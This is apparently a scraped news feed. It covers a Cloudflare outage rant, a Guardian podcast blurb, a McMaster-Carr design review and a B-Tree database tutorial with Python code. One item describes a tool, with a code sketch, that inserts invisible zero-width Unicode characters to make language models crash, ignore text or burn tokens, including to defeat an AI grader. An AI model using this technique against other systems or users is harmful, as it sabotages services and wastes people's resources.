I couldn't get air for my tyres at two garages because of cloudflare going down. Bloody love the lack of resilience that goes into the design when the machine says "cash only" and there's no cash slot. So flat tires for everyone! Brilliant.

We are living in a society where every part of our lives is increasingly mediated through the internet: work, banking, retail, education, entertainment, dating, family, government ID and credit checks. And the internet is increasingly tied up in fewer and fewer points of failure.

It's ironic because the internet was actually designed for decentralisation, a system that governments could use to coordinate their response in the event of nuclear war. But due to the economics of the internet and the challenges of things like bots and scrapers, more and more web services are holed up in citadels like AWS or behind content distribution networks like Cloudflare.

Outages like today's are a good thing because they're a warning . They can force redundancy and resilience into systems. They can make the pillars of our society - governments, businesses, banks - provide reliable alternatives when things go wrong.

(Ideally ones that are completely offline)

You can draw a parallel to how COVID-19 shook up global supply chains: the logic up until 2020 was that you wanted your system to be as lean and efficient as possible, even if it meant relying totally on international supplies or keeping as little spare inventory as possible. After 2020 businesses realised they needed to diversify and build slack in the system to tolerate shocks.

In the same way that growing one kind of banana nearly resulted in bananas going extinct, we're drifting towards a society that can't survive without digital infrastructure; and a digital infrastructure that can't operate without two or three key players. One day there's going to be an outage, a bug, or a cyberattack from a hostile state that demonstrates how fragile that system is.

Embrace outages, and build redundancy.

A free tool that stuns LLMs with thousands of invisible Unicode characters

Hacker News
gibberifier.com
2025-11-24 03:00:31
Comments...
Original Article

Block AIs from reading your text with invisible Unicode characters while preserving meaning for humans.

How it works: This tool inserts invisible zero-width Unicode characters between each character of your input text. The text will look the same but will be much longer and can help stop AI plagiarism. It also helps to waste tokens, causing users to run into rate limits faster.
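
As a rough illustration of that mechanism, here is a minimal Python sketch of the idea (illustrative only, not gibberifier.com's actual code):

# Minimal sketch of the technique described above: interleave zero-width
# Unicode characters between the visible characters of the input text.
# (Illustrative only; not the site's actual implementation.)
ZERO_WIDTH = ["\u200b", "\u200c", "\u200d"]  # zero-width space, non-joiner, joiner

def gibberify(text: str) -> str:
    """Insert an invisible character after every visible character."""
    out = []
    for i, ch in enumerate(text):
        out.append(ch)
        out.append(ZERO_WIDTH[i % len(ZERO_WIDTH)])
    return "".join(out)

original = "Write a 500-word essay on the causes of World War I."  # hypothetical prompt
obfuscated = gibberify(original)
print(len(original), len(obfuscated))  # the obfuscated string is roughly twice as long
print(obfuscated == original)          # False, though both render almost identically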

How to use: This tool works best when gibberifying the most important parts of an essay prompt, up to about 500 characters. This makes it harder for the AI to detect while still functioning well in Google Docs. Some AI models will crash or fail to process the gibberified text, while others will respond with confusion or simply ignore everything inside the gibberified text.

Use cases: Anti-plagiarism, text obfuscation for LLM scrapers, or just for fun!

Even just one word's worth of gibberified text is enough to block something like Flint AI from grading a session.

‘Enshittification’: how we got the internet no one asked for – podcast

Guardian
www.theguardian.com
2025-11-24 03:00:25
Tech critic Cory Doctorow explains why for so many the internet – from Amazon to Google to Instagram – seems to be getting worse Do you ever get the feeling that the internet isn’t what it used to be? Well, tech critic Cory Doctorow thinks you’re right – and he has a term to describe it too: ‘ensh...
Original Article

Tech critic Cory Doctorow explains why for so many the internet – from Amazon to Google to Instagram – seems to be getting worse

Do you ever get the feeling that the internet isn’t what it used to be?

Well, tech critic Cory Doctorow thinks you’re right – and he has a term to describe it too: ‘enshittification’.

He lays out his three-step theory to Nosheen Iqbal , explaining why sites from Amazon to Google to Instagram seem to offer a worsening experience … and what can be done to stop it.


McMaster Carr – The Smartest Website You Haven't Heard Of

Hacker News
www.bedelstein.com
2025-11-24 02:57:34
Comments...
Original Article

Most people I know haven't even heard of it, but mcmaster.com is the best e-commerce site I've ever used.

McMaster-Carr is an industrial supply company. They sell nuts, bolts, bushings, bearings – pretty much anything an engineer needs to build stuff. I've purchased from them dozens of times over the past few years, both for personal and school projects.

But what makes their website so great? And why should an industrial supply company have the best e-commerce site on the internet?

mcmaster.com is great because it does what it needs to, and nothing else.

First, let's look at the visual design of the site. Minimal, mostly grayscale, with accents of green and yellow. There are no popups, animations, banners, carousels, or videos – just a calm, static page with categories and a search bar. Even the images are grayscale, to avoid inadvertently catching your eye.

McMaster Carr homepage

It's not the most visually stunning site, but that doesn't matter here - McMaster has chosen function over form.

A user's goal when they visit McMaster-Carr is to find their part as quickly as possible. The website is designed entirely around that fact. Users rarely come just to browse, so there are no AI recommendation algorithms, featured products, new arrivals – that doesn't make sense in this context. People visit McMaster-Carr with high intent to buy a specific part, that's it.

So how do we get from the 700,000 products in their catalog down to one part? Here's what I do.

Let's say I'm searching for a bolt:

  1. I type "bolt" into the search bar

  2. McMaster shows me several subcategories: hex head, socket head, set screws, etc. I'm looking for socket head, so I select that one.

  3. Now I move my attention to the left nav bar, which shows me several filtering options. Bolts are commonly specified by their thread size (e.g. 1/4"-20), and their length. I'm looking for a 1/4"-20 x 1" bolt, meaning that the bolt's diameter is 1/4" and its length is 1", so I select these filters.

  4. There are over a dozen other filters, such as material, hardness, and head size. Once I've applied enough filters, the main search window shows individual items, rather than subcategories. Here I can select an item and add it to cart.

McMaster's search interface is the main reason for its design superiority. Everything on this page is designed to get you to your part as quickly as possible. The filter sections are simple and elegant, providing schematic illustrations when necessary. The illustrations are always simplified to convey only relevant information, as to not distract you from the focus of your search.

Results pages also show helpful drop-downs which explain the parts you're looking at. It's like an engineer's handbook and catalog in one. Engineers are often looking up terminology on the fly anyways, so having this information embedded into the site saves valuable time.

McMaster's filters are not only useful for a targeted search, but also for deciding what it is you want. Sometimes I'll search with only a general idea of the part I need, and then I'll use the subcategory descriptions to determine specifics. For example, I may know that I need some type of lock washer, but I'm unsure which one is best for my application. I can use the images and descriptions to decide on the right configuration.

lock washers

many varieties of lock washers

McMaster is able to provide such intuitive searching and filtering because everything that they sell is highly legible – it's all defined by quantitative specs. There is nothing intangible to deal with, like brands, product photos, or other marketing fluff. Even still, they do a much better job than other industrial websites like Grainger, DigiKey, or Home Depot.

As a point of comparison, Amazon does a terrible job of filtering items. Amazon has an order of magnitude more products on its site, which admittedly makes the job a lot more difficult. However, even generic filters, like price, suck. I won't get too far into my disdain for amazon's UI design, other people have already written too much about it [1] and that's not the point, but it's interesting to contrast McMaster with what everyone sees as "the" e-commerce site.

Take Amazon's price picker: Why is it two text boxes? Why not a slider? This has always annoyed me, since it's much easier for me to drag a slider than to manually type in my max price. And the quick-select ranges are literally the exact same no matter the product. If I search for a pen, nearly every result I want should be under $25. If I search for a trampoline, every result I want should probably be over $200. What the fuck?! I guess this somehow won the A/B test, but I can't think of a reason why.

Amazon Price Filter

Finally, one of the most brilliant parts of McMaster's product is that for nearly every part, they have a CAD file that you can instantly download into your 3D models. Mechanical engineers mock up designs in CAD programs before actually building them, and having access to pre-modeled parts saves time. (Imagine having to manually model all your nuts and bolts.) McMaster even has extensions for popular CAD programs which allow you to import part files directly, instead of using their website. This makes engineer's lives 10x easier (not to mention making them more likely to purchase from McMaster-Carr). The closest analogy to this is AR try-on, but that's not even very accurate. The point of AR try-on is to determine whether you like the item you're about to buy, whereas the point of McMaster's CAD downloads is to speed up an engineer's workflow. In most cases, they already know which part they need, it's just a matter of completing the CAD model before they can start building the real thing.

Improvements

Mcmaster.com is nearly perfect. It's a website that would make Steve Krug smile. My only suggestion would be to make the search bar on the home page more prominent. It's visually overwhelming to comb through dozens of product photos, so I pretty much always use the search bar to start narrowing down items. The main area of the homepage is effectively dead space, while the search bar is relatively tiny. New users might miss it, wasting time.

I decided to write about McMaster-Carr because it is so rare to see such careful thought go into an industrial web app, far removed from the commotion of silicon valley, web3, D2C, and the other typical subjects of pixel perfection.

Mcmaster.com is a product that understands its customer. The minimal, functional design allows users to find their parts as quickly as possible, nothing more or less. It's an unexpected reminder to not get lost in the allure of smooth gradients, 3D animations, or slick fonts, and instead relentlessly focus on what it is your customers really want.

"If something is 100 percent functional, it is always beautiful...there is no such thing as an ugly nail or an ugly hammer but there's lots of ugly cars, because not everything in a car is functional...sometimes it's very beautiful, if the person who designed it has very good taste, but sometimes it's ugly." [2]

Footnotes

[1] "Jeff Bezos is an infamous micro-manager. He micro-manages every single pixel of Amazon's retail site. He hired Larry Tesler, Apple's Chief Scientist and probably the very most famous and respected human-computer interaction expert in the entire world, and then ignored every goddamn thing Larry said for three years until Larry finally -- wisely -- left the company. Larry would do these big usability studies and demonstrate beyond any shred of doubt that nobody can understand that frigging website, but Bezos just couldn't let go of those pixels, all those millions of semantics-packed pixels on the landing page. They were like millions of his own precious children. So they're all still there, and Larry is not." https://gist.github.com/chitchcock/1281611

B-Trees: Why Every Database Uses Them

Hacker News
mehmetgoekce.substack.com
2025-11-24 02:35:17
Comments...
Original Article

Your database has 10 million user records. You query for one user by ID. The database returns the result in 3 milliseconds. How?

If the database scanned all 10 million records sequentially, it would take seconds, maybe minutes. But databases don’t scan. They use an index—and that index is almost certainly a B-Tree.

Every major database system uses B-Trees: MySQL InnoDB, PostgreSQL, SQLite, MongoDB’s WiredTiger storage engine, Oracle Database, Microsoft SQL Server. It’s not a coincidence. B-Trees solve a fundamental problem: how to efficiently find data on disk when disk access is thousands of times slower than memory access.

This is the story of why binary search trees fail on disk, how B-Trees fix that problem, and why after 50+ years, we’re still using them.

Let’s start with what doesn’t work: binary search trees (BSTs) on disk.

In memory, binary search trees are excellent. Each node stores one key and has two children (left and right). Keys in the left subtree are smaller, keys in the right subtree are larger. Finding a key takes O(log₂ n) comparisons.

Figure 1: Binary search tree with 7 nodes. Finding key 11 takes 3 comparisons: 15 → 7 → 11.

For 1 million records, a balanced BST has height log₂(1,000,000) ≈ 20. That’s 20 comparisons to find any record.

In memory, this is fast. Each comparison is a pointer dereference (~0.0001 milliseconds on modern CPUs). Total lookup: 0.002 ms.

On disk, this is catastrophic. Here’s why:

The smallest unit of disk access is a block (typically 4 KB to 16 KB). To read a single byte from disk, you must read the entire block containing it.

Disk access times (rough orders of magnitude):

  • RAM access: ~100 nanoseconds

  • SSD random read: ~0.1 milliseconds

  • HDD seek: ~10 milliseconds

Disk is 100-100,000x slower than RAM.

With a BST on disk, each node is stored in a separate disk block. Traversing from parent to child requires a disk seek.

For 1 million records:

  • Height: 20 nodes

  • Disk seeks: 20

  • Time on HDD: 20 × 10 ms = 200 milliseconds

  • Time on SSD: 20 × 0.1 ms = 2 milliseconds

That’s acceptable for SSDs, but terrible for HDDs. And it gets worse as the tree grows.

For 1 billion records:

  • Height: 30 nodes

  • Time on HDD: 30 × 10 ms = 300 milliseconds

  • Time on SSD: 30 × 0.1 ms = 3 milliseconds

The fundamental problem: BST fanout is too low (only 2 children per node). We need more children per node to reduce tree height.

You might think: “Just keep the tree balanced!” Red-black trees and AVL trees do this.

The problem isn’t just tree height—it’s maintenance cost. Balancing requires rotating nodes and updating pointers. In memory, this is cheap (a few pointer writes). On disk, it’s expensive:

  1. Read the node from disk (4 KB block)

  2. Modify the node in memory

  3. Write the modified node back to disk (4 KB block)

  4. Update parent pointers (more disk I/O)

For a tree with frequent inserts and deletes, constant rebalancing kills performance. We need a data structure that:

  • Has high fanout (many children per node) → reduces height

  • Requires infrequent rebalancing → reduces I/O overhead

That data structure is the B-Tree.

A B-Tree is a self-balancing tree optimized for disk access. Instead of 2 children per node (binary tree), a B-Tree node has hundreds or thousands of children.

Key idea: Each B-Tree node fits in one disk block (4 KB to 16 KB). Since we must read an entire block anyway, pack as many keys as possible into it.

A B-Tree node stores:

  • N keys (sorted)

  • N + 1 pointers to child nodes

Each key acts as a separator: keys in child[i] are less than key[i], keys in child[i+1] are greater than or equal to key[i].

Figure 2: B-Tree with fanout ~100. Root has 2 keys and 3 children. Internal nodes have 4 keys and 5 children. Leaf nodes contain actual data.

B-Trees have three types of nodes:

Root node: The top of the tree. There’s always exactly one root.

Internal nodes: Middle layers that guide searches. They store separator keys and pointers, but no actual data.

Leaf nodes: Bottom layer containing the actual data (key-value pairs). All leaves are at the same depth.

This is a B+-Tree, the most common variant. B+-Trees store data only in leaves, while B-Trees can store data in internal nodes too. Every major database uses B+-Trees, but calls them “B-Trees” for simplicity.

Binary tree (fanout = 2):

  • 1 million records → height = 20

  • 1 billion records → height = 30

B-Tree (fanout = 100):

  • 1 million records → height = 3 (because 100³ = 1,000,000)

  • 1 billion records → height = 5 (because 100⁵ = 10,000,000,000)

B-Tree (fanout = 1000):

  • 1 million records → height = 2 (because 1000² = 1,000,000)

  • 1 billion records → height = 3 (because 1000³ = 1,000,000,000)

High fanout = fewer disk seeks = faster queries.

Finding a key in a B-Tree is a root-to-leaf traversal with binary search at each node.

Algorithm:

  1. Start at the root node

  2. Binary search the keys in the current node to find the separator key range

  3. Follow the corresponding child pointer

  4. Repeat until reaching a leaf node

  5. In the leaf, either find the key or conclude it doesn’t exist

Time complexity:

  • Tree height: O(log_fanout n)

  • Binary search per node: O(log₂ fanout)

  • Total: O(log n)

Example: Find key 72 in a B-Tree with fanout 100 and 1 million records.

Step 1: Read root node (1 disk I/O)
  Keys: [50, 100, 150, ...]
  72 is between 50 and 100
  Follow child pointer 2

Step 2: Read internal node (1 disk I/O)
  Keys: [55, 60, 65, 70, 75, 80, ...]
  72 is between 70 and 75
  Follow child pointer 5

Step 3: Read leaf node (1 disk I/O)
  Keys: [71, 72, 73, 74]
  Found! Return value for key 72

Total: 3 disk I/O operations = 30 ms on HDD, 0.3 ms on SSD

Let’s implement a simplified but functional B-Tree in Python.

from typing import List, Optional
from dataclasses import dataclass, field


@dataclass
class BTreeNode:
    """
    B-Tree node storing keys and child pointers.

    Attributes:
        keys: Sorted list of keys in this node
        children: List of child node pointers (len = len(keys) + 1)
        is_leaf: True if this is a leaf node (no children)

    Invariants:
        - len(children) == len(keys) + 1 (for internal nodes)
        - All keys are sorted
        - Keys in children[i] < keys[i] < keys in children[i+1]
    """
    keys: List[int] = field(default_factory=list)
    children: List['BTreeNode'] = field(default_factory=list)
    is_leaf: bool = True

    def __repr__(self):
        return f"BTreeNode(keys={self.keys}, is_leaf={self.is_leaf})"


class BTree:
    """
    B-Tree implementation with configurable order.

    Attributes:
        order: Maximum number of children per node (fanout)
        root: Root node of the tree

    Properties:
        - Each node has at most (order - 1) keys
        - Each non-root node has at least (order // 2 - 1) keys
        - Tree height is O(log_order n)

    Time Complexity:
        - Search: O(log n)
        - Insert: O(log n)
        - Delete: O(log n)

    Space Complexity: O(n)
    """

    def __init__(self, order: int = 100):
        """
        Initialize B-Tree.

        Args:
            order: Maximum number of children per node (fanout).
                   Higher order = fewer levels but larger nodes.
                   Typical values: 100-1000 for disk-based storage.
        """
        if order < 3:
            raise ValueError("Order must be at least 3")

        self.order = order
        self.root = BTreeNode()

    def search(self, key: int) -> Optional[int]:
        """
        Search for a key in the B-Tree.

        Args:
            key: The key to search for

        Returns:
            The key if found, None otherwise

        Time Complexity: O(log n) where n is number of keys
        """
        return self._search_recursive(self.root, key)

    def _search_recursive(self, node: BTreeNode, key: int) -> Optional[int]:
        """
        Recursively search for key starting from node.

        Uses binary search within each node to find the correct child.
        """
        # Binary search within this node
        i = self._binary_search(node.keys, key)

        # Found exact match
        if i < len(node.keys) and node.keys[i] == key:
            return key

        # Reached leaf without finding key
        if node.is_leaf:
            return None

        # Recurse into appropriate child
        # (In a real implementation, this would be a disk I/O)
        return self._search_recursive(node.children[i], key)

    def _binary_search(self, keys: List[int], key: int) -> int:
        """
        Binary search to find insertion point for key.

        Returns:
            Index i where keys[i-1] < key <= keys[i]

        Time Complexity: O(log m) where m is number of keys in node
        """
        left, right = 0, len(keys)
        while left < right:
            mid = (left + right) // 2
            if keys[mid] < key:
                left = mid + 1
            else:
                right = mid
        return left

    def insert(self, key: int):
        """
        Insert a key into the B-Tree.

        Args:
            key: The key to insert

        Time Complexity: O(log n)

        Algorithm:
            1. Find the appropriate leaf node
            2. Insert key into leaf
            3. If leaf overflows (too many keys), split it
            4. Propagate split up the tree if necessary
        """
        root = self.root

        # If root is full, split it and create new root
        if len(root.keys) >= self.order - 1:
            new_root = BTreeNode(is_leaf=False)
            new_root.children.append(self.root)
            self._split_child(new_root, 0)
            self.root = new_root

        self._insert_non_full(self.root, key)

    def _insert_non_full(self, node: BTreeNode, key: int):
        """
        Insert key into a node that is not full.

        Recursively finds the correct leaf and inserts.
        """
        i = len(node.keys) - 1

        if node.is_leaf:
            # Insert into sorted position
            node.keys.append(None)  # Make space
            while i >= 0 and key < node.keys[i]:
                node.keys[i + 1] = node.keys[i]
                i -= 1
            node.keys[i + 1] = key
        else:
            # Find child to insert into
            while i >= 0 and key < node.keys[i]:
                i -= 1
            i += 1

            # Split child if it's full
            if len(node.children[i].keys) >= self.order - 1:
                self._split_child(node, i)
                if key > node.keys[i]:
                    i += 1

            self._insert_non_full(node.children[i], key)

    def _split_child(self, parent: BTreeNode, child_index: int):
        """
        Split a full child node into two nodes.

        Args:
            parent: Parent node containing the full child
            child_index: Index of the full child in parent.children

        Algorithm:
            1. Create new sibling node
            2. Move half of keys from full child to sibling
            3. Promote middle key to parent
            4. Update parent's children list
        """
        full_child = parent.children[child_index]
        new_sibling = BTreeNode(is_leaf=full_child.is_leaf)

        mid = (self.order - 1) // 2

        # Save the middle key before truncating the full child
        promoted_key = full_child.keys[mid]

        # Move the upper half of the keys to the new sibling
        new_sibling.keys = full_child.keys[mid + 1:]

        # Move the upper half of the children if not a leaf
        if not full_child.is_leaf:
            new_sibling.children = full_child.children[mid + 1:]
            full_child.children = full_child.children[:mid + 1]

        # Keep only the lower half of the keys in the original child
        full_child.keys = full_child.keys[:mid]

        # Promote middle key to parent
        parent.keys.insert(child_index, promoted_key)
        parent.children.insert(child_index + 1, new_sibling)

    def print_tree(self, node: Optional[BTreeNode] = None, level: int = 0):
        """
        Print tree structure for debugging.
        """
        if node is None:
            node = self.root

        print("  " * level + f"Level {level}: {node.keys}")
        if not node.is_leaf:
            for child in node.children:
                self.print_tree(child, level + 1)


# Example usage and demonstration
if __name__ == "__main__":
    # Create B-Tree with order 5 (max 4 keys per node)
    btree = BTree(order=5)

    # Insert keys
    keys = [10, 20, 5, 6, 12, 30, 7, 17, 3, 16, 21, 24, 25, 26, 27]
    print("Inserting keys:", keys)
    for key in keys:
        btree.insert(key)

    print("\nB-Tree structure:")
    btree.print_tree()

    # Search for keys
    print("\nSearching for keys:")
    for search_key in [6, 16, 21, 100]:
        result = btree.search(search_key)
        if result:
            print(f"  Key {search_key}: FOUND")
        else:
            print(f"  Key {search_key}: NOT FOUND")

    # Demonstrate disk I/O count
    print("\n--- Performance Analysis ---")
    print(f"Tree order (fanout): {btree.order}")
    print(f"Max keys per node: {btree.order - 1}")

    # Estimate tree height for large datasets
    def estimate_height(num_records: int, fanout: int) -> int:
        """Estimate tree height for given number of records and fanout."""
        import math
        return math.ceil(math.log(num_records, fanout))

    datasets = [
        ("1 thousand", 1_000),
        ("1 million", 1_000_000),
        ("1 billion", 1_000_000_000),
    ]

    fanouts = [5, 100, 1000]

    print("\nEstimated tree height (= disk seeks):")
    print(f"{'Dataset':<15} {'Fanout=5':<10} {'Fanout=100':<12} {'Fanout=1000':<12}")
    for name, size in datasets:
        heights = [estimate_height(size, f) for f in fanouts]
        print(f"{name:<15} {heights[0]:<10} {heights[1]:<12} {heights[2]:<12}")

    print("\nDisk access time on HDD (10ms per seek):")
    print(f"{'Dataset':<15} {'Fanout=5':<10} {'Fanout=100':<12} {'Fanout=1000':<12}")
    for name, size in datasets:
        times = [f"{estimate_height(size, f) * 10}ms" for f in fanouts]
        print(f"{name:<15} {times[0]:<10} {times[1]:<12} {times[2]:<12}")

Output:

Inserting keys: [10, 20, 5, 6, 12, 30, 7, 17, 3, 16, 21, 24, 25, 26, 27]

B-Tree structure:
Level 0: [10, 20, 25]
  Level 1: [3, 5, 6, 7]
  Level 1: [12, 16, 17]
  Level 1: [21, 24]
  Level 1: [26, 27, 30]

Searching for keys:
  Key 6: FOUND
  Key 16: FOUND
  Key 21: FOUND
  Key 100: NOT FOUND

--- Performance Analysis ---
Tree order (fanout): 5
Max keys per node: 4

Estimated tree height (= disk seeks):
Dataset         Fanout=5   Fanout=100   Fanout=1000
1 thousand      5          2            1
1 million       9          3            2
1 billion       13         5            3

Disk access time on HDD (10ms per seek):
Dataset         Fanout=5   Fanout=100   Fanout=1000
1 thousand      50ms       20ms         10ms
1 million       90ms       30ms         20ms
1 billion       130ms      50ms         30ms

Why this implementation works:

  • Each node stores up to order - 1 keys

  • Split operation maintains the B-Tree invariants

  • Binary search within nodes reduces comparisons

  • Tree height stays logarithmic

When you insert a key into a full leaf node, the node must split.

Split algorithm:

  1. Find the midpoint of the full node

  2. Create a new sibling node

  3. Move half the keys to the new node

  4. Promote the middle key to the parent

  5. If parent is full, split it recursively

Figure 3: Node split during insertion. The full node is split at the midpoint, and the middle key (30) is promoted to the parent.

When splits propagate to the root:

  • The root is split into two nodes

  • A new root is created with one key (the promoted key from the old root)

  • Tree height increases by 1

This is the only way tree height increases in a B-Tree. B-Trees grow upward from the leaves, not downward from the root.

When you delete a key from a node and it becomes too empty (below 50% capacity), it merges with a sibling.

Merge algorithm:

  1. Copy all keys from right sibling to left sibling

  2. Demote the separator key from parent into the merged node

  3. Remove the right sibling

  4. If parent becomes too empty, merge it recursively

Figure 4: Node merge during deletion. When the right node becomes too empty, it merges with the left node, pulling the separator key from the parent.
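
The listing earlier in this article does not include deletion, so here is a minimal sketch of just this merge step, written against the BTreeNode class above (merge_children is a hypothetical helper, not part of that listing; a production delete also needs underflow detection and key borrowing from siblings):

def merge_children(parent: BTreeNode, i: int) -> None:
    """Merge parent.children[i] with its right sibling parent.children[i + 1],
    pulling down the separator key parent.keys[i] (sketch only)."""
    left = parent.children[i]
    right = parent.children[i + 1]

    # Demote the separator key from the parent into the left node first,
    # so the merged key list stays sorted...
    left.keys.append(parent.keys.pop(i))

    # ...then absorb the right sibling's keys (and children, for internal nodes).
    left.keys.extend(right.keys)
    if not left.is_leaf:
        left.children.extend(right.children)

    # Remove the now-empty right sibling from the parent.
    parent.children.pop(i + 1)
    # If the parent is now too empty, the same merge repeats one level up.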

When merges propagate to the root:

  • If the root has only one child after a merge, that child becomes the new root

  • Tree height decreases by 1

Splits and merges keep the tree balanced. All leaf nodes remain at the same depth, ensuring consistent query performance.

Time complexity: O(log n)

For a tree with n keys and fanout f:

  • Tree height: log_f(n)

  • Binary search per node: log₂(f)

  • Total comparisons: log_f(n) × log₂(f) = log₂(n) = O(log n) (the log f factors cancel)

Disk I/O: log_f(n) disk reads (one per level)

Time complexity: O(log n)

  • Lookup to find insertion point: O(log n)

  • Insert into leaf: O(f) to shift keys

  • Split if necessary: O(f) to move keys

  • Splits propagate up: O(log n) levels in worst case

Disk I/O: O(log n) disk reads + O(log n) disk writes

Time complexity: O(log n)

  • Lookup to find key: O(log n)

  • Delete from leaf: O(f) to shift keys

  • Merge if necessary: O(f) to move keys

  • Merges propagate up: O(log n) levels in worst case

Disk I/O: O(log n) disk reads + O(log n) disk writes

Space: O(n)

Each key is stored once. Internal nodes add overhead (pointers and separator keys), but this is typically 10-20% of data size.

Occupancy: Nodes are typically 50-90% full. Higher fanout improves space efficiency because pointer overhead becomes proportionally smaller.

Every major database uses B-Trees (or B+-Trees) for indexes.

InnoDB uses B+-Trees for:

  • Primary key index (clustered index): Stores actual row data in leaf nodes

  • Secondary indexes : Store pointers to primary key in leaf nodes

InnoDB B-Tree configuration:

  • Page size: 16 KB (default)

  • Fanout: ~100-200 depending on key size

  • Tree height for 1 million rows: 3-4 levels

Example:

-- Create table with primary key
CREATE TABLE users (
    id INT PRIMARY KEY,
    name VARCHAR(100),
    email VARCHAR(100)
) ENGINE=InnoDB;

-- Primary key automatically creates a clustered B+-Tree index
-- Leaf nodes contain the actual row data
-- Tree structure: id=1 stored with name and email in leaf

-- Create secondary index on email
CREATE INDEX idx_email ON users(email);

-- Secondary index is a separate B+-Tree
-- Leaf nodes contain email → id mappings
-- To fetch full row: lookup email in idx_email → get id → lookup id in primary key

InnoDB query performance:

-- Fast: Uses B-Tree index
SELECT * FROM users WHERE id = 12345;
-- Disk I/O: 3-4 reads (tree height)

-- Slow: Full table scan
SELECT * FROM users WHERE name = 'Alice';
-- Disk I/O: 10,000+ reads (scan all pages)

-- Fast: Uses secondary index
SELECT * FROM users WHERE email = 'alice@example.com';
-- Disk I/O: 6-8 reads (3-4 for idx_email + 3-4 for primary key)

PostgreSQL uses B-Trees as the default index type.

PostgreSQL B-Tree configuration:

  • Page size: 8 KB (default)

  • Fanout: ~50-100 depending on key size

  • Supports multiple index types (B-Tree, Hash, GiST, GIN, BRIN), but B-Tree is default

Example:

-- Default index is B-Tree
CREATE INDEX idx_user_id ON users(id);

-- Explicitly specify B-Tree
CREATE INDEX idx_user_email ON users USING BTREE(email);

-- View index structure
SELECT * FROM pg_indexes WHERE tablename = 'users';

SQLite uses B-Trees for both tables and indexes.

SQLite B-Tree configuration:

  • Page size: 4 KB (default, configurable to 64 KB)

  • Fanout: ~50-100

  • All data is stored in B-Trees (no separate heap storage)

Interesting fact: SQLite stores each table as a B+-Tree keyed by rowid (the row data lives in the leaf pages), while its indexes are ordinary B-Trees; R-Tree support is a separate extension used only for spatial queries.

MongoDB’s WiredTiger storage engine uses B-Trees for indexes.

WiredTiger B-Tree configuration:

  • Internal page size: 4 KB (default)

  • Leaf page size: 32 KB (default)

  • Fanout: ~100-200

  • Supports prefix compression to increase fanout

Example:

// MongoDB creates B-Tree index on _id by default
db.users.insertOne({ _id: 1, name: "Alice", email: "alice@example.com" });

// Create secondary index (B-Tree)
db.users.createIndex({ email: 1 });

// Query uses B-Tree index
db.users.find({ email: "alice@example.com" });
// Disk I/O: 3-4 reads (tree height)

// Explain shows index usage
db.users.find({ email: "alice@example.com" }).explain();
// Output: "indexName": "email_1", "stage": "IXSCAN"

B-Trees are not perfect. Here’s when they struggle:

Every insert may trigger splits all the way to the root. In the worst case:

  • Insert 1 key → split leaf → split parent → split grandparent → split root

  • One logical write becomes 4+ physical writes

Example: Inserting 1 million keys with frequent splits:

  • Logical writes: 1 million

  • Physical writes (with splits): 2-3 million

  • Write amplification: 2-3x

Alternative: LSM-Trees (Log-Structured Merge Trees) used by RocksDB, Cassandra, and LevelDB. LSM-Trees batch writes in memory and flush sequentially to disk, avoiding in-place updates.
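
To make the contrast concrete, here is a toy sketch of the LSM write path (a hypothetical TinyLSM class, standard library only; a deliberately simplified illustration, not how RocksDB or Cassandra is actually implemented):

from typing import Optional

class TinyLSM:
    """Toy log-structured merge idea: buffer writes in memory, flush sorted runs."""

    def __init__(self, memtable_limit: int = 4):
        self.memtable = {}        # recent writes, held in memory
        self.runs = []            # immutable sorted runs, standing in for on-disk SSTables
        self.memtable_limit = memtable_limit

    def put(self, key: int, value: str) -> None:
        self.memtable[key] = value               # no in-place page update
        if len(self.memtable) >= self.memtable_limit:
            # Flush: write the whole memtable out as one sorted, sequential run.
            self.runs.append(sorted(self.memtable.items()))
            self.memtable = {}

    def get(self, key: int) -> Optional[str]:
        if key in self.memtable:                 # check the freshest data first
            return self.memtable[key]
        for run in reversed(self.runs):          # then newer runs before older ones
            for k, v in run:                     # (a real engine would binary search and use Bloom filters)
                if k == key:
                    return v
        return None

db = TinyLSM()
for i in range(10):
    db.put(i, f"value-{i}")
print(db.get(3), len(db.runs))                   # -> value-3 2

Because flushes append whole sorted runs instead of rewriting pages in place, writes stay sequential; the cost shows up later as compaction and multi-run reads.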

B-Trees are optimized for range queries on the indexed key, but struggle with multi-column range queries.

Example:

-- Fast: Range query on indexed column
SELECT * FROM orders WHERE order_date BETWEEN ‘2024-01-01’ AND ‘2024-12-31’;
-- B-Tree traverses leaf nodes sequentially (leaf nodes are linked)

-- Slow: Range query on non-indexed column
SELECT * FROM orders WHERE total_amount BETWEEN 100 AND 200;
-- Must scan entire table (no index on total_amount)

-- Slow: Multi-column range query
CREATE INDEX idx_date_amount ON orders(order_date, total_amount);
SELECT * FROM orders WHERE order_date > ‘2024-01-01’ AND total_amount > 100;
-- B-Tree can use order_date range, but must filter total_amount in memory

Alternative: Multi-dimensional indexes like R-Trees (for spatial data) or hybrid indexes.

To avoid disk I/O, databases cache frequently accessed B-Tree nodes in memory. For a large database:

  • 1 billion records

  • Tree height: 4 levels

  • Internal nodes: ~1 million

  • Cache size: ~16 GB (to cache all internal nodes)

Rule of thumb: Plan for 10-20% of your database size in RAM for B-Tree caches.

After many inserts and deletes, B-Tree nodes may be only 50-60% full. This wastes space and increases tree height.

Solution: Periodic VACUUM (PostgreSQL) or OPTIMIZE TABLE (MySQL) to rebuild B-Trees.

Example:

-- PostgreSQL: Rebuild table and indexes
VACUUM FULL users;

-- MySQL: Optimize table (rebuilds B-Tree)
OPTIMIZE TABLE users;

B-Trees require locking during splits and merges. In high-concurrency workloads, lock contention can bottleneck writes.

Solution: Latch-free B-Trees (used in modern databases like Microsoft SQL Server) or MVCC (Multi-Version Concurrency Control).

B-Trees are excellent for disk-based sorted data, but not always optimal:

If you’re doing 100,000 writes/sec with few reads, LSM-Trees outperform B-Trees.

Comparison: B-Trees update pages in place and offer low-latency reads and cheap range scans; LSM-Trees buffer writes in memory and flush them to disk sequentially, trading extra read and compaction work for much higher write throughput.

Examples:

  • B-Tree: MySQL, PostgreSQL, SQLite

  • LSM-Tree: RocksDB, Cassandra, LevelDB

If your entire dataset fits in RAM, B-Trees add unnecessary complexity. Hash indexes or skip lists are simpler and faster.

Comparison: a hash index gives O(1) point lookups but no ordered iteration or range scans; an in-memory B-Tree or skip list keeps keys sorted, paying O(log n) per lookup for that ability.

Examples:

  • Hash index: Memcached, Redis hashes

  • Skip list: Redis sorted sets
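
As a rough illustration of that in-memory trade-off (toy data, Python standard library only; not how Redis or Memcached is implemented):

import bisect

ids = {42: "alice", 7: "bob", 99: "carol"}     # hash index: O(1) point lookups...
print(ids[42])                                  # -> alice
                                                # ...but no ordered iteration or range scans

sorted_keys = sorted(ids)                       # sorted structure: O(log n) point lookups,
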